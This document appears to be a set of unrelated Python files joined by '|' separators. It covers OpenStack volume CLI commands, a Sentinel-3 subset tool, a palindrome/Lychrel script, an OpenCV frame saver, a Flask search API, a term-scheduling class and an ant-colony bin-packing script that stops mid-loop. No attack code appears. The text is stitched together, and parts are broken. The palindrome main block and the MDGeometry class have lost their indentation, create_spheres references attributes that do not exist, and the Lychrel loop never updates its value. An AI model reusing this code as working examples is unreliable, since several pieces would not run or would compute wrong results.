    def get_parser(self, prog_name):
        """Build the argument parser for ``volume create``."""
        parser = super(CreateVolume, self).get_parser(prog_name)
        parser.add_argument(
            'name',
            metavar='<name>',
            help=_('Volume name'),
        )
        # --size may be omitted only when --snapshot or --source supplies
        # the size implicitly (enforced by _check_size_arg in take_action).
        parser.add_argument(
            '--size',
            metavar='<size>',
            type=int,
            help=_(
                "Volume size in GB (Required unless --snapshot or "
                "--source is specified)"
            ),
        )
        parser.add_argument(
            '--type',
            metavar='<volume-type>',
            help=_("Set the type of volume"),
        )
        # A volume can be created from at most one source: image,
        # snapshot (by name or, deprecated/hidden, by ID), or another volume.
        source_group = parser.add_mutually_exclusive_group()
        source_group.add_argument(
            '--image',
            metavar='<image>',
            help=_('Use <image> as source of volume (name or ID)'),
        )
        source_group.add_argument(
            '--snapshot',
            metavar='<snapshot>',
            help=_('Use <snapshot> as source of volume (name or ID)'),
        )
        # Hidden compatibility alias for --snapshot taking a raw ID.
        source_group.add_argument(
            '--snapshot-id',
            metavar='<snapshot-id>',
            help=argparse.SUPPRESS,
        )
        source_group.add_argument(
            '--source',
            metavar='<volume>',
            help=_('Volume to clone (name or ID)'),
        )
        parser.add_argument(
            '--description',
            metavar='<description>',
            help=_('Volume description'),
        )
        parser.add_argument(
            '--user',
            metavar='<user>',
            help=_('Specify an alternate user (name or ID)'),
        )
        parser.add_argument(
            '--project',
            metavar='<project>',
            help=_('Specify an alternate project (name or ID)'),
        )
        parser.add_argument(
            '--availability-zone',
            metavar='<availability-zone>',
            help=_('Create volume in <availability-zone>'),
        )
        parser.add_argument(
            '--property',
            metavar='<key=value>',
            action=parseractions.KeyValueAction,
            help=_(
                'Set a property on this volume '
                '(repeat option to set multiple properties)'
            ),
        )
        bootable_group = parser.add_mutually_exclusive_group()
        bootable_group.add_argument(
            "--bootable",
            action="store_true",
            help=_("Mark volume as bootable"),
        )
        bootable_group.add_argument(
            "--non-bootable",
            action="store_true",
            help=_("Mark volume as non-bootable (default)"),
        )
        readonly_group = parser.add_mutually_exclusive_group()
        readonly_group.add_argument(
            "--read-only",
            action="store_true",
            help=_("Set volume to read-only access mode"),
        )
        readonly_group.add_argument(
            "--read-write",
            action="store_true",
            help=_("Set volume to read-write access mode (default)"),
        )
        return parser

    def take_action(self, parsed_args):
        """Create the volume, optionally set flags, and return (cols, vals)."""
        # Fail fast if neither --size nor a source was given.
        _check_size_arg(parsed_args)
        identity_client = self.app.client_manager.identity
        image_client = self.app.client_manager.image
        volume_client = self.app.client_manager.volume
        # Resolve user-supplied names to IDs before calling the create API.
        source_volume = None
        if parsed_args.source:
            source_volume = utils.find_resource(
                volume_client.volumes,
                parsed_args.source,
            ).id
        project = None
        if parsed_args.project:
            project = utils.find_resource(
                identity_client.tenants,
                parsed_args.project,
            ).id
        user = None
        if parsed_args.user:
            user = utils.find_resource(
                identity_client.users,
                parsed_args.user,
            ).id
        image = None
        if parsed_args.image:
            image = utils.find_resource(
                image_client.images,
                parsed_args.image,
            ).id
        # --snapshot takes precedence over the hidden --snapshot-id alias.
        snapshot = parsed_args.snapshot or parsed_args.snapshot_id
        volume = volume_client.volumes.create(
            parsed_args.size,
            snapshot,
            source_volume,
            parsed_args.name,
            parsed_args.description,
            parsed_args.type,
            user,
            project,
            parsed_args.availability_zone,
            parsed_args.property,
            image,
        )
        # Bootable flag can only be set once the volume leaves the creating
        # state; wait for 'available' first. Failures are logged, not raised.
        if parsed_args.bootable or parsed_args.non_bootable:
            try:
                if utils.wait_for_status(
                    volume_client.volumes.get,
                    volume.id,
                    success_status=['available'],
                    error_status=['error'],
                    sleep_time=1,
                ):
                    volume_client.volumes.set_bootable(
                        volume.id, parsed_args.bootable
                    )
                else:
                    msg = _(
                        "Volume status is not available for setting boot "
                        "state"
                    )
                    raise exceptions.CommandError(msg)
            except Exception as e:
                LOG.error(_("Failed to set volume bootable property: %s"), e)
        # Same wait-then-set dance for the read-only access flag.
        if parsed_args.read_only or parsed_args.read_write:
            try:
                if utils.wait_for_status(
                    volume_client.volumes.get,
                    volume.id,
                    success_status=['available'],
                    error_status=['error'],
                    sleep_time=1,
                ):
                    volume_client.volumes.update_readonly_flag(
                        volume.id, parsed_args.read_only
                    )
                else:
                    msg = _(
                        "Volume status is not available for setting it"
                        "read only."
                    )
                    raise exceptions.CommandError(msg)
            except Exception as e:
                LOG.error(
                    _(
                        "Failed to set volume read-only access "
                        "mode flag: %s"
                    ),
                    e,
                )
        # Map 'metadata' column to 'properties'
        volume._info.update(
            {
                'properties': format_columns.DictColumn(
                    volume._info.pop('metadata')
                ),
                'type': volume._info.pop('volume_type'),
            },
        )
        # Replace "display_name" by "name", keep consistent in v1 and v2
        if 'display_name' in volume._info:
            volume._info.update({'name': volume._info.pop('display_name')})
        volume_info = utils.backward_compat_col_showone(
            volume._info, parsed_args.columns, {'display_name': 'name'}
        )
        return zip(*sorted(volume_info.items()))
class DeleteVolume(command.Command):
    """``volume delete`` command: delete one or more volumes by name or ID."""

    _description = _("Delete volume(s)")

    def get_parser(self, prog_name):
        parser = super(DeleteVolume, self).get_parser(prog_name)
        parser.add_argument(
            'volumes',
            metavar='<volume>',
            nargs="+",
            help=_('Volume(s) to delete (name or ID)'),
        )
        parser.add_argument(
            '--force',
            action='store_true',
            default=False,
            help=_(
                'Attempt forced removal of volume(s), regardless of state '
                '(defaults to False)'
            ),
        )
        return parser

    def take_action(self, parsed_args):
        """Delete each named volume; report a summary error at the end."""
        volume_client = self.app.client_manager.volume
        failures = 0
        for name_or_id in parsed_args.volumes:
            try:
                volume_obj = utils.find_resource(volume_client.volumes, name_or_id)
                # --force bypasses state checks server-side.
                delete = (volume_client.volumes.force_delete
                          if parsed_args.force
                          else volume_client.volumes.delete)
                delete(volume_obj.id)
            except Exception as e:
                failures += 1
                LOG.error(
                    _(
                        "Failed to delete volume with "
                        "name or ID '%(volume)s': %(e)s"
                    ),
                    {'volume': name_or_id, 'e': e},
                )
        if failures > 0:
            total = len(parsed_args.volumes)
            msg = _("%(result)s of %(total)s volumes failed " "to delete.") % {
                'result': failures,
                'total': total,
            }
            raise exceptions.CommandError(msg)
class ListVolume(command.Lister):
    """``volume list`` command: list volumes, optionally filtered."""

    _description = _("List volumes")

    def get_parser(self, prog_name):
        """Build the argument parser for ``volume list``."""
        parser = super(ListVolume, self).get_parser(prog_name)
        parser.add_argument(
            '--name',
            metavar='<name>',
            help=_('Filter results by volume name'),
        )
        parser.add_argument(
            '--status',
            metavar='<status>',
            help=_('Filter results by status'),
        )
        parser.add_argument(
            '--all-projects',
            action='store_true',
            default=False,
            help=_('Include all projects (admin only)'),
        )
        parser.add_argument(
            '--long',
            action='store_true',
            default=False,
            help=_('List additional fields in output'),
        )
        # Offset/limit implement simple pagination of the listing.
        parser.add_argument(
            '--offset',
            type=int,
            action=parseractions.NonNegativeAction,
            metavar='<offset>',
            help=_('Index from which to start listing volumes'),
        )
        parser.add_argument(
            '--limit',
            type=int,
            action=parseractions.NonNegativeAction,
            metavar='<num-volumes>',
            help=_('Maximum number of volumes to display'),
        )
        return parser

    def take_action(self, parsed_args):
        """List volumes and return (column_headers, row_generator)."""
        volume_client = self.app.client_manager.volume
        compute_client = self.app.client_manager.compute
        # --long adds type/bootable/properties columns to the output.
        if parsed_args.long:
            columns = (
                'ID',
                'Display Name',
                'Status',
                'Size',
                'Volume Type',
                'Bootable',
                'Attachments',
                'Metadata',
            )
            column_headers = (
                'ID',
                'Name',
                'Status',
                'Size',
                'Type',
                'Bootable',
                'Attached to',
                'Properties',
            )
        else:
            columns = (
                'ID',
                'Display Name',
                'Status',
                'Size',
                'Attachments',
            )
            column_headers = (
                'ID',
                'Name',
                'Status',
                'Size',
                'Attached to',
            )
        # Cache the server list
        # (lets AttachmentsColumn render server names instead of IDs).
        server_cache = {}
        try:
            for s in compute_client.servers.list():
                server_cache[s.id] = s
        except Exception:
            # Just forget it if there's any trouble
            pass
        # Bind the cache so the formatter can be instantiated with only
        # the column value (see AttachmentsColumn docstring).
        AttachmentsColumnWithCache = functools.partial(
            AttachmentsColumn, server_cache=server_cache
        )
        search_opts = {
            'all_tenants': parsed_args.all_projects,
            'display_name': parsed_args.name,
            'status': parsed_args.status,
        }
        if parsed_args.offset:
            search_opts['offset'] = parsed_args.offset
        data = volume_client.volumes.list(
            search_opts=search_opts,
            limit=parsed_args.limit,
        )
        # Honor user-requested legacy column names ('Display Name').
        column_headers = utils.backward_compat_col_lister(
            column_headers, parsed_args.columns, {'Display Name': 'Name'}
        )
        return (
            column_headers,
            (
                utils.get_item_properties(
                    s,
                    columns,
                    formatters={
                        'Metadata': format_columns.DictColumn,
                        'Attachments': AttachmentsColumnWithCache,
                    },
                )
                for s in data
            ),
        )
class MigrateVolume(command.Command):
    """``volume migrate`` command: move a volume to another backend host."""

    _description = _("Migrate volume to a new host")

    def get_parser(self, prog_name):
        parser = super(MigrateVolume, self).get_parser(prog_name)
        parser.add_argument(
            'volume',
            metavar="<volume>",
            help=_("Volume to migrate (name or ID)"),
        )
        parser.add_argument(
            '--host',
            metavar="<host>",
            required=True,
            help=_(
                "Destination host (takes the form: host@backend-name#pool)"
            ),
        )
        parser.add_argument(
            '--force-host-copy',
            action="store_true",
            help=_(
                "Enable generic host-based force-migration, "
                "which bypasses driver optimizations"
            ),
        )
        return parser

    def take_action(self, parsed_args):
        """Resolve the volume and kick off the migration."""
        client = self.app.client_manager.volume
        target = utils.find_resource(client.volumes, parsed_args.volume)
        client.volumes.migrate_volume(
            target.id,
            parsed_args.host,
            parsed_args.force_host_copy,
        )
class SetVolume(command.Command):
    """``volume set`` command: update name/description/size/flags/properties.

    Each requested change is attempted independently; failures are logged
    and counted, and a single CommandError is raised at the end if any
    operation failed.
    """

    _description = _("Set volume properties")

    def get_parser(self, prog_name):
        """Build the argument parser for ``volume set``."""
        parser = super(SetVolume, self).get_parser(prog_name)
        parser.add_argument(
            'volume',
            metavar='<volume>',
            help=_('Volume to modify (name or ID)'),
        )
        parser.add_argument(
            '--name',
            metavar='<name>',
            help=_('New volume name'),
        )
        parser.add_argument(
            '--description',
            metavar='<description>',
            help=_('New volume description'),
        )
        parser.add_argument(
            '--size',
            metavar='<size>',
            type=int,
            help=_('Extend volume size in GB'),
        )
        parser.add_argument(
            "--no-property",
            dest="no_property",
            action="store_true",
            help=_(
                "Remove all properties from <volume> "
                "(specify both --no-property and --property to "
                "remove the current properties before setting "
                "new properties.)"
            ),
        )
        parser.add_argument(
            '--property',
            metavar='<key=value>',
            action=parseractions.KeyValueAction,
            help=_(
                'Set a property on this volume '
                '(repeat option to set multiple properties)'
            ),
        )
        bootable_group = parser.add_mutually_exclusive_group()
        bootable_group.add_argument(
            "--bootable",
            action="store_true",
            help=_("Mark volume as bootable"),
        )
        bootable_group.add_argument(
            "--non-bootable",
            action="store_true",
            help=_("Mark volume as non-bootable"),
        )
        readonly_group = parser.add_mutually_exclusive_group()
        readonly_group.add_argument(
            "--read-only",
            action="store_true",
            help=_("Set volume to read-only access mode"),
        )
        readonly_group.add_argument(
            "--read-write",
            action="store_true",
            help=_("Set volume to read-write access mode"),
        )
        return parser

    def take_action(self, parsed_args):
        """Apply each requested change; raise if any of them failed."""
        volume_client = self.app.client_manager.volume
        volume = utils.find_resource(volume_client.volumes, parsed_args.volume)
        # Count of failed operations; checked once at the end.
        result = 0
        # Extend the volume; only valid on 'available' volumes and the new
        # size must be strictly larger than the current one.
        if parsed_args.size:
            try:
                if volume.status != 'available':
                    msg = (
                        _(
                            "Volume is in %s state, it must be available "
                            "before size can be extended"
                        )
                        % volume.status
                    )
                    raise exceptions.CommandError(msg)
                if parsed_args.size <= volume.size:
                    msg = (
                        _("New size must be greater than %s GB") % volume.size
                    )
                    raise exceptions.CommandError(msg)
                volume_client.volumes.extend(volume.id, parsed_args.size)
            except Exception as e:
                LOG.error(_("Failed to set volume size: %s"), e)
                result += 1
        # --no-property runs before --property so both together mean
        # "replace all properties".
        if parsed_args.no_property:
            try:
                volume_client.volumes.delete_metadata(
                    volume.id, volume.metadata.keys()
                )
            except Exception as e:
                LOG.error(_("Failed to clean volume properties: %s"), e)
                result += 1
        if parsed_args.property:
            try:
                volume_client.volumes.set_metadata(
                    volume.id, parsed_args.property
                )
            except Exception as e:
                LOG.error(_("Failed to set volume property: %s"), e)
                result += 1
        # parsed_args.bootable is True only for --bootable, so it doubles
        # as the flag value when either option was given.
        if parsed_args.bootable or parsed_args.non_bootable:
            try:
                volume_client.volumes.set_bootable(
                    volume.id, parsed_args.bootable
                )
            except Exception as e:
                LOG.error(_("Failed to set volume bootable property: %s"), e)
                result += 1
        # Same pattern for the read-only access flag.
        if parsed_args.read_only or parsed_args.read_write:
            try:
                volume_client.volumes.update_readonly_flag(
                    volume.id, parsed_args.read_only
                )
            except Exception as e:
                LOG.error(
                    _(
                        "Failed to set volume read-only access "
                        "mode flag: %s"
                    ),
                    e,
                )
                result += 1
        # Name/description use the v1 'display_*' field names.
        kwargs = {}
        if parsed_args.name:
            kwargs['display_name'] = parsed_args.name
        if parsed_args.description:
            kwargs['display_description'] = parsed_args.description
        if kwargs:
            try:
                volume_client.volumes.update(volume.id, **kwargs)
            except Exception as e:
                LOG.error(
                    _(
                        "Failed to update volume display name "
                        "or display description: %s"
                    ),
                    e,
                )
                result += 1
        if result > 0:
            raise exceptions.CommandError(
                _("One or more of the " "set operations failed")
            )
class ShowVolume(command.ShowOne):
    """``volume show`` command: display one volume's details."""

    _description = _("Show volume details")

    def get_parser(self, prog_name):
        parser = super(ShowVolume, self).get_parser(prog_name)
        parser.add_argument(
            'volume',
            metavar='<volume>',
            help=_('Volume to display (name or ID)'),
        )
        return parser

    def take_action(self, parsed_args):
        """Fetch the volume and return its properties as (columns, values)."""
        volume_client = self.app.client_manager.volume
        volume = utils.find_resource(volume_client.volumes, parsed_args.volume)
        info = volume._info
        # Map 'metadata' column to 'properties'
        info['properties'] = format_columns.DictColumn(info.pop('metadata'))
        info['type'] = info.pop('volume_type')
        # Surface the admin-only tenant attribute under a friendlier key.
        tenant_key = 'os-vol-tenant-attr:tenant_id'
        if tenant_key in info:
            info['project_id'] = info.pop(tenant_key)
        # Replace "display_name" by "name", keep consistent in v1 and v2
        if 'display_name' in info:
            info['name'] = info.pop('display_name')
        volume_info = utils.backward_compat_col_showone(
            info, parsed_args.columns, {'display_name': 'name'}
        )
        return zip(*sorted(volume_info.items()))
class UnsetVolume(command.Command):
    """``volume unset`` command: remove properties from a volume."""

    _description = _("Unset volume properties")

    def get_parser(self, prog_name):
        parser = super(UnsetVolume, self).get_parser(prog_name)
        parser.add_argument(
            'volume',
            metavar='<volume>',
            help=_('Volume to modify (name or ID)'),
        )
        parser.add_argument(
            '--property',
            metavar='<key>',
            action='append',
            help=_(
                'Remove a property from volume '
                '(repeat option to remove multiple properties)'
            ),
        )
        return parser

    def take_action(self, parsed_args):
        """Delete the named metadata keys, if any were given."""
        client = self.app.client_manager.volume
        # Resolve the volume first so a bad name fails even without keys.
        volume = utils.find_resource(client.volumes, parsed_args.volume)
        keys = parsed_args.property
        if keys:
            client.volumes.delete_metadata(volume.id, keys)
|
def solution(arr, cmds):
    """For each command [i, j, k], sort the slice arr[i-1:j] ascending and
    pick its k-th (1-based) element."""
    return [sorted(arr[start - 1:end])[rank - 1] for start, end, rank in cmds]


print(solution([1, 5, 2, 6, 3, 7, 4], [[2, 5, 3], [4, 4, 1], [1, 7, 3]]))
|
"""
Subset Tool eopy.dataIO.Product.Product for Sentinel-3 data, subclass of AbstractProcessingTool
"""
'''___Built-In Modules___'''
import sys
from os.path import dirname, basename
from os.path import join as pjoin
'''___Third-Party Modules___'''
'''___NPL Modules___'''
dataProcessing_directory = dirname(dirname(dirname(dirname(__file__))))
sys.path.append(dataProcessing_directory)
from AbstractProcessingTool import AbstractProcessingTool
sys.path.append(dirname(__file__))
from OLCIL1SubsetFactory import OLCIL1SubsetFactory
sys.path.append(pjoin(dirname(dirname(dirname(__file__))), "snappy_shared"))
from SnappySubsetFactory import SnappySubsetFactory
'''___Authorship___'''
__author__ = "Sam Hunt"
__created__ = "21/06/2017"
__credits__ = ["Andrew Banks", "Javier Gorrono", "Niall Origo", "Tracy Scanlon"]
__version__ = "0.0"
__maintainer__ = "Sam Hunt"
__email__ = "sam.hunt@npl.co.uk"
__status__ = "Development"
class Sentinel3SubsetTool(AbstractProcessingTool):
    """
    Sentinel3SubsetTool is a sub-class of AbstractProcessingTool for returning a subset of a Sentinel-3 data product,
    e.g. a region of interest

    :Attributes:
        .. py:attribute:: processingFactory
            *obj*
            Instance of sub-class of *eopy.dataProcessing.AbstractProcessingTool.AbstractProcessingTool* for
            processing for converting given Sentinel-3 data with units of radiance to reflectance

    :Methods:
        .. py:method:: setProcessingFactory(...):
            Return the appropriate processing factory for a Sentinel-3 *eopy.dataIO.Product.Product* object.
            *If no suitable factory in processor implementation available returns None*

    :Inherited from eopy.dataProcessing.AbstractProcessingTool.AbstractProcessingTool:
        .. py:method:: __init__(...):
            Finds suitable processing factory for ``product_string`` if possible
        .. py:method:: processProduct(...):
            Returns processed version of input *eopy.dataIO.Product.Product* object, using functionality from
            processing factory
    """

    def setProcessingFactory(self, product_string):
        """
        Return the appropriate processing factory for a Sentinel-3 *eopy.dataIO.Product.Product* object.

        :type product_string: str
        :param product_string: *eopy.dataIO.Product.Product* object "product_string" entry of its attributes dictionary

        :return:
            :ProcessingFactory: *cls*
                Processing Factory suitable for Sentinel-3 *eopy.dataIO.Product.Product* object.
                *If no suitable processing factory in processor implementation available returns None*
        """
        # OLCI L1 radiance products (full / reduced resolution) have a
        # dedicated subset factory.
        if product_string in ("OL_1_EFR", "OL_1_ERR"):
            return OLCIL1SubsetFactory
        # All other supported Sentinel-3 product types currently fall back
        # to the generic snappy-based subset factory:
        #   OL_2_* - OLCI L2 water/land & atmos parameters (full/reduced res)
        #   SL_1_RBT - SLSTR L1 radiance & brightness temperatures
        #   SL_2_* - SLSTR L2 sea/land surface temperature products
        #   SY_* - Synergy products
        # todo - Write product-specific subset factories for these types?
        snappy_products = {
            "OL_2_WFR", "OL_2_LFR", "OL_2_WRR", "OL_2_LRR",
            "SL_1_RBT", "SL_2_WCT", "SL_2_WST", "SL_2_LST",
            "SY_1_SYN", "SY_2_SYN", "SY_2_VEG",
        }
        if product_string in snappy_products:
            return SnappySubsetFactory
        # Unrecognized product type: no factory available.
        return None
# Module is library-only; nothing to run when executed directly.
if __name__ == "__main__":
    pass
|
__author__ = 'subin'
class Palindrome():
    """Palindrome test plus one step of the reverse-and-add ("196") algorithm."""

    def Check_palindrome(self, IntegerValue):
        """Classify ``IntegerValue`` (int or digit string).

        Returns 0 if it has fewer than 2 digits (treated as invalid input),
        1 if it is a palindrome, 2 if it is not.
        """
        digits = str(IntegerValue)
        length = len(digits)
        if length < 2:
            return 0
        # BUG FIX: the original kept overwriting a Flag inside the loop, so a
        # matching *later* pair erased an earlier mismatch (e.g. 2113 was
        # reported as a palindrome). Return 2 as soon as any pair differs.
        # Integer floor division also replaces '/', which breaks range()
        # under Python 3. The identical even/odd branches are unified:
        # the middle digit of an odd-length number needs no comparison.
        for i in range(length // 2):
            if digits[i] != digits[(length - 1) - i]:
                return 2
        return 1

    def Check_lychrel(self, IntegerValue):
        """Return one reverse-and-add step: n + reverse(n)."""
        digits = str(IntegerValue)
        return int(digits) + int(digits[::-1])
IntegerValue = raw_input('Enter your Integer:')
Palindrome_obj = Palindrome()
if Palindrome_obj.Check_palindrome(IntegerValue) == 0:
print 'Error: Please Enter a \'2\' digit number.\n','------------------------------------------------------------'
elif Palindrome_obj.Check_palindrome(IntegerValue) == 1:
print IntegerValue, 'is a natural palindrome\n','------------------------------------------------------------'
else:
New_IntegerValue = Palindrome_obj.Check_lychrel(IntegerValue)
for i in range(1, 61):
if Palindrome_obj.Check_palindrome(New_IntegerValue) == 2:
IntegerValue_1 = Palindrome_obj.Check_lychrel(New_IntegerValue)
else:
print 'Yeild a palindrome {0} in {1} iteration using \'196\' algorithm.'.format(New_IntegerValue, i),'\n------------------------------------------------------------'
break
if Palindrome_obj.Check_palindrome(New_IntegerValue) == 2:
print IntegerValue, 'is a LYCHREL NUMBER.\n', '------------------------------------------------------------'
|
import cv2
import re
import os
import time

# MJPEG stream endpoint served by the camera server.
URL = "http://vrl-shrimp.cv:5000/video_feed"
video = cv2.VideoCapture(URL)

# Count the existing .jpg files in the save folder to pick the starting
# frame number (translated from the original Japanese comment).
save_folder = "/Users/kubo/ex/python/shrimp_pool/JPEGImages/"
cnt = 0
# BUG FIX: os.chdir() returns None, so the original bound ``dir = None``
# (shadowing the builtin) and only worked because os.listdir(None) happens
# to list the cwd. List the folder explicitly instead.
for file_name in os.listdir(save_folder):
    if re.search('.jpg', file_name):
        cnt = cnt + 1

while True:
    ret, img = video.read()
    # BUG FIX: ``not img == None`` compares a numpy frame elementwise and
    # raises on truth-testing; use an identity check instead.
    if img is not None:
        cv2.imshow("Stream Video", img)
    key = cv2.waitKey(1) & 0xff
    if key == ord('q'):
        break
    # 's' saves the current frame under the next sequential number.
    if key == ord('s') and img is not None:
        cnt_zero = str(cnt).zfill(5)  # zero-pad the frame number
        print(save_folder + cnt_zero + ".jpg")
        cv2.imwrite(save_folder + cnt_zero + ".jpg", img, [cv2.IMWRITE_JPEG_QUALITY, 100])
        cnt = cnt + 1
|
from md_statistics import *
from md_unit_converter import *
from math import pi
class MDGeometry:
def __init__(self, md):
self.md = md
self.unit_converter = MDUnitConverter(md)
self.md_statistics = MDStatistics(md, self.unit_converter)
def create_spheres(self, num_spheres, r_min, r_max, x_max, y_max, z_max):
num_nodes = self.nodes_x*self.nodes_y*self.nodes_z
self.run_command("%s -O3 program/create_spheres/create_spheres.cpp -o create_spheres" % self.compiler)
self.run_command("./create_spheres %d %d %f %f %f %f %f" % (num_nodes, num_spheres, r_min, r_max, x_max, y_max, z_max))
def create_cylinders(self, radius = 0.45, num_cylinders_per_dimension = 1):
system_length = self.md_statistics.calculate_system_length()
num_nodes = self.md.nodes_x*self.md.nodes_y*self.md.nodes_z
max_length = max(system_length[0], system_length[1])
print "System length: ", system_length
radius = radius*max_length
self.md.run_command("%s -O3 program/create_cylinder/create_cylinder.cpp -o create_cylinder" % self.md.compiler)
self.md.run_command("./create_cylinder "+str(num_nodes)+" "+str(radius)+" "+str(num_cylinders_per_dimension)+" "+str(system_length[0])+" "+str(system_length[1])+" "+str(system_length[2]))
volume = system_length[2]*num_cylinders_per_dimension**2*pi*radius**2
self.md_statistics.update_new_volume(volume=volume) |
from flask_restful import Resource,reqparse
from flask import Flask,abort,request
import config
import helpers
class CheckHealth(Resource):
    """Liveness endpoint: always responds with a static status payload."""

    def get(self):
        payload = {"status": "Hey Geek, Im Up and running "}
        return payload
class SearchBooks(Resource):
    """Search endpoint: proxies the `book` query argument to the upstream books API."""

    def get(self):
        # Reject requests that omit the mandatory `book` query parameter
        # instead of silently building a URL that contains the string "None".
        book = request.args.get('book')
        if not book:
            return abort(400, 'Missing required query parameter: book')
        Url = "%s%s" % (config.EndpointURL, book)
        responsestatus, response = helpers.GetResponsefromAPICall(Url)
        if responsestatus == 200:
            return response
        else:
            return abort(400, 'Unable to process the requests')
|
from datetime import *
class Term:
    """Semester term dates with observer notification.

    The class behaves like a pseudo-singleton: the first construction
    initialises the fields; every later construction routes through
    update_term() so only changed fields are overwritten.
    """

    __instantiated = False  # class-wide flag: has any Term been built yet?

    def __init__(self, term_start, term_end, holidays_start, holidays_end, day_offs=None):
        # Every instance needs its own observer list, whichever branch runs;
        # the original only created it on the first instantiation, so
        # add_observer() on later instances raised AttributeError.
        self.observers = []
        if not self.instantiated():
            self.instantiate()
            self.term_start = term_start
            self.term_end = term_end
            self.holidays_start = holidays_start
            self.holidays_end = holidays_end
            self.day_offs = day_offs
        else:
            print('Updating...')
            # BUG FIX: forward day_offs too (it was silently dropped before).
            self.update_term(term_start, term_end, holidays_start, holidays_end, day_offs)

    @classmethod
    def instantiated(cls):
        """Return True once any Term has been constructed."""
        return cls.__instantiated

    @classmethod
    def instantiate(cls):
        cls.__instantiated = True

    def add_observer(self, observer):
        self.observers.append(observer)

    def push_update(self):
        # Observers follow a simple no-argument update() protocol.
        for observer in self.observers:
            observer.update()

    def update_term(self, term_start, term_end, holidays_start, holidays_end, day_offs=None):
        """Overwrite any field whose value differs from the current one.

        BUG FIX: uses getattr with a sentinel so this also works on an
        instance that has no fields yet -- the original compared
        self.term_start unconditionally and raised AttributeError when a
        second Term was constructed.
        """
        missing = object()  # sentinel distinguishes "absent" from None
        if getattr(self, 'term_start', missing) != term_start:
            self.term_start = term_start
        if getattr(self, 'term_end', missing) != term_end:
            self.term_end = term_end
        if getattr(self, 'holidays_start', missing) != holidays_start:
            self.holidays_start = holidays_start
        if getattr(self, 'holidays_end', missing) != holidays_end:
            self.holidays_end = holidays_end
        if getattr(self, 'day_offs', missing) != day_offs:
            self.day_offs = day_offs

    def display_term(self):
        print('Semester starts: {}\nSemester ends: {}\nHolidays start: {}\nHolidays end: {}'
              .format(self.term_start, self.term_end, self.holidays_start, self.holidays_end))

    def return_term_start(self):
        return self.term_start

    def return_term_end(self):
        return self.term_end

    def return_holidays_start(self):
        return self.holidays_start

    def return_holidays_end(self):
        return self.holidays_end

    def return_day_offs(self):
        return self.day_offs
class SummerTerm(Term):
    """Term variant for the summer semester (no specialised behaviour yet)."""
    pass
class WinterTerm(Term):
    """Term variant for the winter semester (no specialised behaviour yet)."""
    pass
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 1 18:41:42 2020
@author: abhishekhegde
"""
from itertools import combinations
from scipy import sparse
import numpy as np
import random
from random import randint
import copy
import binpacking
import pandas as pd
### Bin packing problem parameters ###
# Item weights are read from a CSV with one weight per row (no header).
x = pd.read_csv('u250_00.csv',header=None)
#x = [442,252,252,252,252,252,252,252,127,127,127,127,127,106,106,106,106,85,84,46,37,37,12,12,12,10,10,10,10,10,10,9,9]
weight = np.uint64(np.array(x))  # item weights as unsigned integers
n=len(weight)  # number of items
capacity = 150  # bin capacity
### Ant colony algorithm parameters ###
iteration = 1000  # number of ACO generations
ant_num = 10  # ants per generation
beta = 6  # exponent on item weight in the transition rule (see main loop)
rou = 0.95  # pheromone persistence factor (evaporation multiplier)
rot = 0  # presumably: generations since last global-best reinforcement -- see main loop
fit_k= 2  # fitness exponent (rewards fuller bins)
df = pd.DataFrame([])  # per-generation results log
def Rwheel(prob, i=1):
    """Roulette-wheel selection: draw `i` distinct indices with probabilities `prob`.

    Returns a scalar index when i == 1, otherwise an array of indices.
    """
    drawn = np.random.choice(len(prob), i, replace=False, p=prob)
    return drawn[0] if i == 1 else drawn
def check_inter(x):
    """Return 1 when `x` contains exactly two elements, else 0."""
    return 1 if len(x) == 2 else 0
def array_row_intersection(a,b):
    """Return the rows of 2-D array `a` that also appear as rows in `b`.

    tmp[i, j] is 1 when row i of `a` equals row j of `b`; the cumsum*tmp==1
    trick appears intended to keep only the first occurrence of a duplicated
    row of `a`. NOTE(review): assumes `a` and `b` have the same number of
    columns -- confirm with callers.
    """
    tmp=np.prod(np.swapaxes(a[:,:,None],1,2)==b,axis=2)
    return a[np.sum(np.cumsum(tmp,axis=0)*tmp==1,axis=1).astype(bool)]
############# Define min tau ################################
# Initial pheromone level; with rou < 1 this is the evaporation fixed point.
min_tau = 1/ (1 - rou)
############# Pheromone matrix initialisation #################################
# Symmetric pairwise pheromone table indexed by the distinct item weights.
ph_mat = pd.DataFrame(min_tau,columns=np.unique(x), index=np.unique(x))
############# Define ant properties ############################
class ant_class:
    """One ant's candidate bin-packing solution.

    Attributes (set externally by the main loop):
        items   -- list of bins, each a list of item indices
        Fitness -- mean (bin fill / capacity) ** fit_k over all bins
        bin_w   -- total weight currently packed in each bin
    Reads the module-level globals weight, capacity and fit_k.
    """

    def fitness_func(self):
        """Compute self.Fitness from self.items."""
        total = 0  # renamed: the original shadowed the builtin sum()
        for i in range(len(self.items)):
            total = total + (np.sum(weight[self.items[i]]) / capacity) ** fit_k
        self.Fitness = total / len(self.items)

    def weight(self):
        """Recompute self.bin_w, the packed weight of every bin."""
        self.bin_w = []
        for i in range(len(self.items)):
            # renamed loop variable: the original shadowed the module-level x
            bin_items = [weight[idx] for idx in self.items[i]]
            self.bin_w.append(np.sum(bin_items))
############################ Main ###########################################
# Ant-colony optimisation main loop for 1-D bin packing: each generation,
# every ant greedily fills bins using pheromone x weight heuristics, and the
# best solutions reinforce the pheromone matrix (MMAS-style).
ant = ant_class()
w = np.array(weight)
time =0
Gbest = 0;
while(time < iteration):
    Pbest = 0;
    for i in range(ant_num):
        # Start a fresh solution from a random first item.
        rand_post = random.randint(0,len(weight)-1)
        unvisit_wt = list(range(len(weight)))
        #print(rand_post)
        ###### Each ant computing one complete solution to the bin packing problem ######
        ant.items = [[rand_post]]
        ant.weight()
        #print(ant.bin_w)
        bin_count = 0
        unvisit_wt.remove(rand_post)
        for uv_id in range(len(weight)-1):
            # Candidate items that still fit in the current bin.
            remaining = capacity - ant.bin_w[bin_count]
            subspace = [unvisit_wt[i] for i in range(len(unvisit_wt)) if (weight[unvisit_wt[i]] <= remaining)]
            if(len(subspace) == 0):
                # Current bin cannot take any remaining item: open a new bin.
                bin_count = bin_count+1
                ant.items.append([])
                remaining = capacity
                subspace = [unvisit_wt[i] for i in range(len(unvisit_wt)) if (weight[unvisit_wt[i]] <= remaining)]
            num_sum = []
            denom_sum = 0
            for sub_i in range(len(subspace)):
                temp_num_sum = 0
                if(len(ant.items[bin_count]) != 0):
                    # Average pheromone between the candidate and the items
                    # already in the bin, scaled by weight**beta.
                    for j in (ant.items[bin_count]):
                        temp = [subspace[sub_i],j]
